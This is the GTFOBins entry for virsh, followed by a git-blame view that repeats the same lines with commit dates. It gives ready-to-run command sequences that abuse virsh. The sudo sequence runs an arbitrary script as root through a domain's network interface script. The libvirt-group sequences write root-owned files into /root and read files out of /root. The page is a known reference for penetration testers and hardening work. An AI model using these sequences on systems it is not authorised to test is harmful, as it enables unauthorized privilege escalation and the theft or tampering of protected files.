GTFOBins.github.io/_gtfobins/virsh.md

---
functions:
  sudo:
    - code: |
        SCRIPT=script_to_run
        TF=$(mktemp)
        cat > $TF << EOF
        <domain type='kvm'>
          <name>x</name>
          <os>
            <type arch='x86_64'>hvm</type>
          </os>
          <memory unit='KiB'>1</memory>
          <devices>
            <interface type='ethernet'>
              <script path='$SCRIPT'/>
            </interface>
          </devices>
        </domain>
        EOF
        sudo virsh -c qemu:///system create $TF
        virsh -c qemu:///system destroy x
  file-write:
    - description: This requires the user to be in the `libvirt` group to perform privileged file write. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.
      code: |
        LFILE_DIR=/root
        LFILE_NAME=file_to_write

        echo 'data' > data_to_write

        TF=$(mktemp)
        cat > $TF <<EOF
        <volume type='file'>
          <name>y</name>
          <key>$LFILE_DIR/$LFILE_NAME</key>
          <source>
          </source>
          <capacity unit='bytes'>5</capacity>
          <allocation unit='bytes'>4096</allocation>
          <physical unit='bytes'>5</physical>
          <target>
            <path>$LFILE_DIR/$LFILE_NAME</path>
            <format type='raw'/>
            <permissions>
              <mode>0600</mode>
              <owner>0</owner>
              <group>0</group>
            </permissions>
          </target>
        </volume>
        EOF

        virsh -c qemu:///system pool-create-as x dir --target $LFILE_DIR
        virsh -c qemu:///system vol-create --pool x --file $TF
        virsh -c qemu:///system vol-upload --pool x $LFILE_DIR/$LFILE_NAME data_to_write
        virsh -c qemu:///system pool-destroy x
  file-read:
    - description: This requires the user to be in the `libvirt` group to perform privileged file read.
      code: |
        LFILE_DIR=/root
        LFILE_NAME=file_to_read

        SPATH=file_to_save

        virsh -c qemu:///system pool-create-as x dir --target $LFILE_DIR
        virsh -c qemu:///system vol-download --pool x $LFILE_NAME $SPATH
        virsh -c qemu:///system pool-destroy x
---
Add virsh 2020-12-25 21:04:07 +01:00			`---`
			`functions:`
Add virsh 2021-03-07 15:29:57 +01:00			`sudo:`
			`- code: \|`
Add virsh 2020-12-25 21:04:07 +01:00			`SCRIPT=script_to_run`
			`TF=$(mktemp)`
			`cat > $TF << EOF`
			`<domain type='kvm'>`
Add virsh 2021-03-07 15:29:57 +01:00			`<name>x</name>`
Add virsh 2020-12-25 21:04:07 +01:00			`<os>`
			`<type arch='x86_64'>hvm</type>`
			`</os>`
			`<memory unit='KiB'>1</memory>`
			`<devices>`
			`<interface type='ethernet'>`
			`<script path='$SCRIPT'/>`
			`</interface>`
			`</devices>`
			`</domain>`
			`EOF`
Add virsh 2021-03-07 15:29:57 +01:00			`sudo virsh -c qemu:///system create $TF`
			`virsh -c qemu:///system destroy x`
Fix virsh 2021-03-07 15:33:12 +01:00			`file-write:`
Fix trailing spaces 2021-03-12 22:38:27 +01:00			- description: This requires the user to be in the `libvirt` group to perform privileged file write. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.
Add virsh 2020-12-25 21:04:07 +01:00			`code: \|`
Add virsh 2021-03-07 15:29:57 +01:00			`LFILE_DIR=/root`
			`LFILE_NAME=file_to_write`

			`echo 'data' > data_to_write`

			`TF=$(mktemp)`
			`cat > $TF <<EOF`
			`<volume type='file'>`
			`<name>y</name>`
			`<key>$LFILE_DIR/$LFILE_NAME</key>`
			`<source>`
			`</source>`
			`<capacity unit='bytes'>5</capacity>`
			`<allocation unit='bytes'>4096</allocation>`
			`<physical unit='bytes'>5</physical>`
			`<target>`
			`<path>$LFILE_DIR/$LFILE_NAME</path>`
			`<format type='raw'/>`
			`<permissions>`
			`<mode>0600</mode>`
			`<owner>0</owner>`
			`<group>0</group>`
			`</permissions>`
			`</target>`
			`</volume>`
			`EOF`

			`virsh -c qemu:///system pool-create-as x dir --target $LFILE_DIR`
			`virsh -c qemu:///system vol-create --pool x --file $TF`
			`virsh -c qemu:///system vol-upload --pool x $LFILE_DIR/$LFILE_NAME data_to_write`
			`virsh -c qemu:///system pool-destroy x`
Fix virsh 2021-03-07 15:33:12 +01:00			`file-read:`
Polish virsh 2021-03-07 15:42:30 +01:00			- description: This requires the user to be in the `libvirt` group to perform privileged file read.
Add virsh 2020-12-25 21:04:07 +01:00			`code: \|`
Add virsh 2021-03-07 15:29:57 +01:00			`LFILE_DIR=/root`
			`LFILE_NAME=file_to_read`

			`SPATH=file_to_save`

			`virsh -c qemu:///system pool-create-as x dir --target $LFILE_DIR`
			`virsh -c qemu:///system vol-download --pool x $LFILE_NAME $SPATH`
			`virsh -c qemu:///system pool-destroy x`
Add virsh 2020-12-25 21:04:07 +01:00			`---`